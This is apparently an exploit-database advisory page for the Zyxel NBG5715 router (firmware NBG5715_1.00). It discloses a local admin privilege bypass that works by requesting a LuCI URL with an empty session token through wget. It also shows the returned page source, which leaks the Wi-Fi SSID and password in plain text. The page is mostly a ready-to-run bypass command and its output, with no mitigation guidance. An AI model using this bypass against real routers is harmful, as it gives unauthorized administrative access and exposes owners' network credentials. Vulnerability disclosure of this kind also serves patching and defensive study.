Zyxel NBG5715 Local admin privileges bypass Vulnerability



EKU-ID: 3250 CVE: OSVDB-ID:
Author: drwxrwxrwx Published: 2013-06-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


==================================================================================================
    | |                                                                  
  __| | _ __ __      ____  __ _ __ __      ____  __ _ __ __      ____  __
 / _` || '__|\ \ /\ / /\ \/ /| '__|\ \ /\ / /\ \/ /| '__|\ \ /\ / /\ \/ /
| (_| || |    \ V  V /  >  < | |    \ V  V /  >  < | |    \ V  V /  >  < 
 \__,_||_|     \_/\_/  /_/\_\|_|     \_/\_/  /_/\_\|_|     \_/\_/  /_/\_\
==================================================================================================
Zyxel NBG5715
Simultaneous Dual-Band Wireless N900 Media Router
Local admin privileges bypass and Local Wireless Plain Text Password Disclosure
Firmware Version Affected:	NBG5715_1.00
Release Date: 20 November 2012
Discover: drwxrwxrwx <drwxrwxrwx@linuxmail.org>
Vendor: ZyXEL
Products Affected: NBG5715

==================================================================================================
VULN: Local admin privileges bypass doing wget 192.168.1.1/cgi-bin/luci/;stok=/easy/networkmap#
==================================================================================================
DATA:

<title>.::Welcome to ZyXEL NBG5715::.</title>

	with ( document.forms[0] ){
		/* 2.4G */
		if(wlanRadio.selectedIndex == 0){
			wlanSSID.value = "Defaultssid";
			
				wlanSec.selectedIndex = 2;
			
			
			wlanPwd.value = "thedefaultpassword";
		}
		else{ /* 5G */
			wlanSSID.value = "Defaultssid";
			
				wlanSec.selectedIndex = 2;
			
			
			wlanPwd.value = "thedefaultpassword";
		}
		changeSec();
	}
}
==================================================================================================
Gretz